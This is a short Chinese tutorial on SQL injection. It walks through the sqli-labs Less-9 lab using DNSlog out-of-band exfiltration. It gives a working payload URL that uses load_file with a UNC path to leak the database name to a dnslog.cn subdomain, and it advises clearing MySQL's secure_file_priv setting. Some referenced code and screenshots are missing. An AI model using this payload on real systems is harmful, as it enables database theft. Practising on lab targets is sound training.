简介
SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。
SQL注入的一个简要流程:
1、打开目标靶场
2、选择less - 9
3、打开网址dnslog.cn
4、截取信息
可复制一下代码
5、返回页面
即可查询收集到的信息
6、修改代码
即可获取数据库名称
127.0.0.1/Less-9/?id=1' union select 1,2,(load_file(concat('\\\\',(select database()),'.sdjiw.dnslog.cn\\abc'))) %23
7、提示
若无法使用,则在 phpstudy_pro\Extensions\MySQL5.7.26\my.ini 文件中添加语句
secure_file_priv = '' 即可
安全
网络安全为人民,网络安全靠人民。